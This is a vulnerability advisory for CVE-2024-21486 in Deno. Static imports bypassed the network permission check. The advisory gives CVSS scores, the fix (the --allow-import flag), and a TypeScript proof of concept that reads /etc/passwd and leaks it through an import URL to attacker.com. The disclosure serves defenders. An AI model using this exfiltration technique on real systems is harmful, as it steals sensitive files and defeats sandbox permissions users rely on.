logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-21486 deno

Package

Manager: cargo
Name: deno
Vulnerable Version: >=0 <2.0.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Deno vulnerable to Exposure of Sensitive Information to an Unauthorized Actor ### Summary Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network. ### Details Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with `deno run`: 1. The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code. 2. When `--allow-write` and `--allow-read` permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file. ### PoC ```ts const __filename = new URL("", import.meta.url).pathname; let oldContent = await Deno.readTextFile(__filename); let passFile = await Deno.readTextFile("/etc/passwd"); let pre = 'import {foo} from "[https://attacker.com?val=](https://attacker.com/?val=)' + encodeURIComponent(passFile) + '";\n'; await Deno.writeTextFile(__filename, pre + oldContent); ``` Executing a file containing this payload twice, with `deno run --allow-read --allow-write` would cause the password file to leak on the network, even though no network permission was granted. This vulnerability was fixed with the addition of the `--allow-import` flag: https://docs.deno.com/runtime/fundamentals/security/#network-access

Metadata

Created: 2025-06-05T01:21:08Z
Modified: 2025-06-05T01:21:08Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-jv4x-jv3h-qff5/GHSA-jv4x-jv3h-qff5.json
CWE IDs: ["CWE-200"]
Alternative ID: GHSA-jv4x-jv3h-qff5
Finding: F017
Auto approve: 1